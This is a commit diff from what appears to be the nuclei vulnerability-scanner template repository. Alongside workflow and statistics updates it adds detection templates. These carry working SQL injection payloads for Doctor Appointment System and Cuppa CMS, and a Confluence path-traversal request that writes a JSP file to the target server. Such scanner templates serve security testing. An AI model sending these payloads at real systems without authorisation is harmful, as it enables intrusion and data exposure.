Merge branch 'main' into cve

patch-1
Ritik Chaddha 2023-05-13 20:07:47 +05:30 committed by GitHub
commit bffcfa759b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
109 changed files with 6515 additions and 3487 deletions


@ -6,9 +6,9 @@ addAssignees: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
- DhiyaneshGeek
- ritikchaddha
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
@ -16,9 +16,9 @@ numberOfReviewers: 1
# A list of assignees, overrides reviewers if set
assignees:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
- ritikchaddha
# A number of assignees to add to the pull request
# Set to 0 to add all of the assignees.


@ -5,7 +5,7 @@ on:
branches:
- main
paths:
- 'cves/**.yaml'
- '**/cves/**.yaml'
workflow_dispatch:
jobs:
@ -35,8 +35,7 @@ jobs:
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git pull
git add cves
git add .
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes
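Review bot: `git add .` together with `git commit ... -a` on the next line stages and pushes everything left in the workspace under the bot identity, not just the annotated templates, so any stray file written by an earlier step or by the annotator's tooling lands on `main` without review; stage only the `cves` directories the annotator writes (the same set the `paths` filter above selects) and drop the now-redundant `-a`. If the widening to `.` is intentional, a comment above `git add .` saying which generated files it is meant to pick up would keep the next reader from narrowing it back. The step's `- name:` line and the job's permissions begin outside the hunk.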


@ -5,7 +5,7 @@ on:
branches:
- main
paths:
- 'cves/**'
- '**/cves/'
workflow_dispatch: # allows manual triggering of the workflow
jobs:
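Review bot: The new filter `'**/cves/'` ends in a slash, and push path filters are matched against the changed file paths, so it likely never matches and the push trigger would silently stop firing; the sibling workflow in this commit uses `'**/cves/**.yaml'`, and `'**/cves/**'` would cover every file under those directories. `workflow_dispatch` still works, which can hide the regression until someone notices the job no longer runs on merges. The `on:` block begins above the hunk.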


@ -12,7 +12,10 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Go
uses: actions/setup-go@v4
with:
@ -23,12 +26,14 @@ jobs:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
id: checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.checksum.outputs.CHANGES > 0
run: |
git pull
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
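Review bot: `go install .../generate-checksum@dev` installs whatever the `dev` branch holds at run time and the job then commits that tool's output back to the repository, so a change on that branch alters what gets pushed here with no review on this side; this section already pins `actions/checkout@v3` and `actions/setup-go@v4`, and the tool should likewise be pinned, `go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@<release-tag-or-commit>`. The absolute path on the `generate-checksum` line can be `${{ github.workspace }}` so the job does not depend on the repository name and runner layout. The `CHANGES` gate counts every line of `git status -s`, untracked files included; a comment stating that this is intended would help.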


@ -1,26 +1,62 @@
file/keys/postman-api-key.yaml
headless/technologies/sap-spartacus.yaml
http/cves/2017/CVE-2017-17731.yaml
http/cves/2019/CVE-2019-3398.yaml
http/cves/2020/CVE-2020-27481.yaml
http/cves/2021/CVE-2021-27314.yaml
http/cves/2021/CVE-2021-27315.yaml
http/cves/2021/CVE-2021-27316.yaml
http/cves/2021/CVE-2021-27319.yaml
http/cves/2021/CVE-2021-27320.yaml
http/cves/2021/CVE-2021-30175.yaml
http/cves/2021/CVE-2021-44228.yaml
http/cves/2022/CVE-2022-24264.yaml
http/cves/2022/CVE-2022-24265.yaml
http/cves/2022/CVE-2022-24266.yaml
http/cves/2022/CVE-2022-24716.yaml
http/cves/2022/CVE-2022-27984.yaml
http/cves/2022/CVE-2022-27985.yaml
http/cves/2022/CVE-2022-3980.yaml
http/cves/2022/CVE-2022-42095.yaml
http/cves/2022/CVE-2022-42096.yaml
http/cves/2022/CVE-2022-4328.yaml
http/cves/2022/CVE-2022-45037.yaml
http/cves/2022/CVE-2022-45038.yaml
http/cves/2022/CVE-2022-46020.yaml
http/cves/2023/CVE-2023-1020.yaml
http/cves/2023/CVE-2023-1671.yaml
http/cves/2023/CVE-2023-20864.yaml
http/cves/2023/CVE-2023-25135.yaml
http/cves/2023/CVE-2023-26360.yaml
http/cves/2023/CVE-2023-27350.yaml
http/cves/2023/CVE-2023-27524.yaml
http/cves/2023/CVE-2023-29489.yaml
http/cves/2023/CVE-2023-29922.yaml
http/cves/2023/CVE-2023-30210.yaml
http/cves/2023/CVE-2023-30212.yaml
http/cves/2023/CVE-2023-31059.yaml
http/cves/2023/CVE-2023-32235.yaml
http/default-logins/powerjob-default-login.yaml
http/default-logins/umami/umami-default-login.yaml
http/exposed-panels/eclipse-birt-panel.yaml
http/exposed-panels/jedox-web-panel.yaml
http/exposed-panels/oracle-opera-login.yaml
http/exposed-panels/papercut-ng-panel.yaml
http/exposed-panels/proxmox-panel.yaml
http/exposed-panels/red-lion-panel.yaml
http/exposed-panels/sophos-web-appliance.yaml
http/exposures/configs/platformio-ini.yaml
http/exposures/logs/nginx-shards.yaml
http/exposures/tokens/postman/postman-key.yaml
http/fuzzing/ssrf-via-proxy.yaml
http/fuzzing/waf-fuzz.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
http/osint/mail-archive.yaml
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
http/vulnerabilities/generic/generic-env.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml
network/enumeration/smtp-commands-enum.yaml
network/enumeration/smtp/smtp-user-enum.yaml


@ -23,15 +23,15 @@ tags:
# unless asked for by the user.
files:
- cves/2006/CVE-2006-1681.yaml
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml
- cves/2020/CVE-2020-28351.yaml
- cves/2021/CVE-2021-35265.yaml
- vulnerabilities/oracle/oracle-ebs-xss.yaml
- vulnerabilities/other/nginx-module-vts-xss.yaml
- http/cves/2006/CVE-2006-1681.yaml
- http/cves/2007/CVE-2007-5728.yaml
- http/cves/2014/CVE-2014-9608.yaml
- http/cves/2018/CVE-2018-5233.yaml
- http/cves/2019/CVE-2019-14696.yaml
- http/cves/2020/CVE-2020-11930.yaml
- http/cves/2020/CVE-2020-19295.yaml
- http/cves/2020/CVE-2020-2036.yaml
- http/cves/2020/CVE-2020-28351.yaml
- http/cves/2021/CVE-2021-35265.yaml
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
- http/vulnerabilities/other/nginx-module-vts-xss.yaml


@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1770 | dhiyaneshdk | 805 | cves | 1749 | info | 2816 | http | 5695 |
| panel | 873 | dwisiswant0 | 793 | exposed-panels | 865 | high | 1230 | file | 117 |
| wordpress | 769 | daffainfo | 662 | osint | 633 | medium | 1007 | network | 90 |
| wp-plugin | 660 | pikpikcu | 353 | technologies | 562 | critical | 654 | dns | 18 |
| exposure | 657 | pdteam | 278 | vulnerabilities | 554 | low | 215 | | |
| osint | 638 | pussycat0x | 235 | misconfiguration | 432 | unknown | 25 | | |
| xss | 624 | geeknik | 219 | exposures | 375 | | | | |
| tech | 599 | ricardomaia | 214 | token-spray | 240 | | | | |
| edb | 595 | ritikchaddha | 196 | workflows | 190 | | | | |
| lfi | 538 | 0x_akoko | 179 | default-logins | 128 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
**382 directories, 6373 files**.
**395 directories, 6435 files**.
</td>
</tr>



@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1770 | dhiyaneshdk | 805 | cves | 1749 | info | 2816 | http | 5695 |
| panel | 873 | dwisiswant0 | 793 | exposed-panels | 865 | high | 1230 | file | 117 |
| wordpress | 769 | daffainfo | 662 | osint | 633 | medium | 1007 | network | 90 |
| wp-plugin | 660 | pikpikcu | 353 | technologies | 562 | critical | 654 | dns | 18 |
| exposure | 657 | pdteam | 278 | vulnerabilities | 554 | low | 215 | | |
| osint | 638 | pussycat0x | 235 | misconfiguration | 432 | unknown | 25 | | |
| xss | 624 | geeknik | 219 | exposures | 375 | | | | |
| tech | 599 | ricardomaia | 214 | token-spray | 240 | | | | |
| edb | 595 | ritikchaddha | 196 | workflows | 190 | | | | |
| lfi | 538 | 0x_akoko | 179 | default-logins | 128 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |


@ -1 +1 @@
4.3.6.1
4.3.7


@ -1 +1 @@
6.4.3
6.4.5


@ -1 +1 @@
3.13.0
3.13.2


@ -1 +1 @@
6.9.3
7.0.0


@ -1 +1 @@
3.0.22
3.0.23


@ -0,0 +1 @@
4.12.2


@ -1 +1 @@
2.4.4
2.4.5


@ -1 +1 @@
15.7.0
15.7.1


@ -1 +1 @@
1.6.13
1.6.14


@ -1 +1 @@
4.14.0
4.15.0


@ -1 +1 @@
4.4.1
4.4.1.1


@ -1 +1 @@
3.35
3.36


@ -1 +1 @@
3.6.23
3.6.24


@ -1 +1 @@
2.4.9
2.5.2


@ -1 +1 @@
5.2.1
5.2.2


@ -1 +1 @@
2.1.2
2.1.3


@ -1 +1 @@
2.3.1
2.3.2


@ -1 +1 @@
1.6
1.6.1


@ -1 +1 @@
7.6.1
7.7.0


@ -1 +1 @@
20.6
20.7


@ -1 +1 @@
2.25.0
2.26.0


@ -0,0 +1,71 @@
id: CVE-2019-3398
info:
name: Atlassian Confluence Download Attachments - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
reference:
- https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2019-3398
tags: cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
os_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=
- |
GET /pages/createpage.action HTTP/1.1
Host: {{Hostname}}
- |
POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1
Host: {{Hostname}}
${{{num1}}*{{num2}}}
- |
GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1
Host: {{Hostname}}
- |
GET /pages/{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- "{{result}}"
extractors:
- type: regex
part: body
name: csrftoken
internal: true
group: 1
regex:
- 'name="atlassian\-token" content="([a-z0-9]+)"> '
- type: regex
part: body
name: draftID
internal: true
group: 1
regex:
- 'ta name="ajs\-draft\-id" content="([0-9]+)">'
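Review bot: This template has no `classification` block (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`) and no `metadata` with `max-request`, both of which the other new CVE templates in this commit carry; adding them keeps the metadata queryable in the same way. The `csrftoken` regex `'name="atlassian\-token" content="([a-z0-9]+)"> '` ends in a space inside the quotes, so it fails whenever the `>` is followed directly by a newline; if the trailing space is deliberate it deserves a comment, otherwise it should go. The third raw request writes `{{randstr}}.jsp` into the application's pages directory and nothing in the template removes it, so the `description` or a comment above that request should state that a successful run leaves that file on the target for the operator to clean up.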


@ -16,7 +16,7 @@ info:
metadata:
max-request: 1
requests:
http:
- raw:
- |
@timeout: 15s


@ -0,0 +1,38 @@
id: CVE-2021-27314
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27314
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Doctor Appoinment System")'
condition: and
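Review bot: `verified: "true"` is a quoted string, while the existing template touched in this commit writes the boolean `verified: true` (the Reprise License Manager hunk); use the boolean so tooling that type-checks metadata reads all templates the same way, and add `max-request: 1` under `metadata` as the older templates in this commit do. The quoted form recurs in the other new templates here: CVE-2021-27315, CVE-2021-27316, CVE-2021-27319, CVE-2021-27320, CVE-2022-24264, CVE-2022-24265, CVE-2022-24266, CVE-2022-27984, CVE-2022-27985, CVE-2022-3980, CVE-2022-42095 and CVE-2022-42096, and `max-request` is missing from all of them except CVE-2022-3980. The five Doctor Appointment System templates also share the identical `name`; naming the injected parameter in each, e.g. `Doctor Appointment System 1.0 - SQL Injection (username)`, would make their findings distinguishable in output.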


@ -0,0 +1,38 @@
id: CVE-2021-27315
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27315
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and


@ -0,0 +1,38 @@
id: CVE-2021-27316
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27316
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27316
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and


@ -0,0 +1,38 @@
id: CVE-2021-27319
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27319
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27319
cwe-id: CWE-89
metadata:
verified: "true"
tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and


@ -0,0 +1,38 @@
id: CVE-2021-27320
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27320
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and


@ -19,7 +19,7 @@ info:
epss-score: 0.01387
metadata:
max-request: 1
tags: cve,cve2021,payara,lfi
tags: cve,cve2021,payara,lfi,packetstorm
http:
- method: GET


@ -19,7 +19,7 @@ info:
epss-score: 0.02296
metadata:
max-request: 1
tags: cve,cve2021,sqli
tags: cve2021,sqli,packetstorm,cve
http:
- method: POST


@ -19,7 +19,7 @@ info:
epss-score: 0.95073
metadata:
max-request: 1
tags: cve2021,placeos,redirect,edb,cve
tags: redirect,edb,cve,packetstorm,cve2021,placeos
http:
- method: GET


@ -22,7 +22,7 @@ info:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-query: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,cve
tags: cve,packetstorm,cve2021,rlm,auth-bypass
http:
- method: GET


@ -19,7 +19,7 @@ info:
epss-score: 0.00924
metadata:
max-request: 1
tags: virtualui,tenable,cve,cve2021,exposure,thinfinity
tags: cve,cve2021,exposure,thinfinity,packetstorm,virtualui,tenable
http:
- raw:


@ -17,7 +17,7 @@ info:
cve-id: CVE-2021-45046
cwe-id: CWE-502
epss-score: 0.97416
tags: cve,cve2021,rce,oast,log4j,injection
tags: cve,cve2021,rce,oast,log4j,injection,kev
metadata:
max-request: 1
@ -55,19 +55,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28
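Review bot: The new `\d{6}\.` prefix on the three regexes assumes that `{{rand1}}` and `{{rand2}}` together always render as exactly six digits; the variables are declared outside the hunk, so that coupling is invisible where the regexes live and a later change to the variables would silently break the matcher and both extractors. A comment on the first regex, `# \d{6} must equal the combined width of rand1 and rand2 declared under variables`, records the dependency. The enclosing `matchers` and `extractors` lists start above the hunk.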


@ -19,7 +19,7 @@ info:
epss-score: 0.69904
metadata:
max-request: 1
tags: iframe,thinfinity,tenable,cve,cve2021,injection
tags: packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection
http:
- method: GET


@ -18,7 +18,7 @@ info:
epss-score: 0.01125
metadata:
max-request: 1
tags: cve,cve2021,dlink,lfi,router
tags: lfi,router,packetstorm,cve,cve2021,dlink
http:
- method: POST


@ -0,0 +1,57 @@
id: CVE-2022-24264
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24264
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24264
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(num)}}'
- 'td_available_languages'
condition: and
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200
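Review bot: The `description` places the endpoint under `/administrator/components/table_manager/`, but the raw requests post to `/` and `/components/table_manager/`; if this relies on the scan target already carrying the `/administrator` prefix, a comment above the first raw request should say so, otherwise the request paths should include it. The same description/request mismatch appears in CVE-2022-24265, CVE-2022-24266, CVE-2022-27984 and CVE-2022-27985. `num: '999999999'` is a fixed value, so the `{{md5(num)}}` marker is the same string on every run; the `{{rand_int(...)}}` form used by the CVE-2019-3398 template in this commit would keep a stale or cached page from matching.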


@ -0,0 +1,46 @@
id: CVE-2022-24265
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24265
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24265
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/menu/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "menu/html/edit.php")'
condition: and


@ -0,0 +1,46 @@
id: CVE-2022-24266
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24266
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24266
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "list_admin_table")'
condition: and


@ -0,0 +1,39 @@
id: CVE-2022-24716
info:
name: Icinga Web 2 - Arbitrary File Disclosure
author: DhiyaneshDK
severity: high
description: |
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
reference:
- https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
metadata:
max-request: 3
shodan-query: title:"Icinga"
tags: cve,cve2023,icinga,lfi
http:
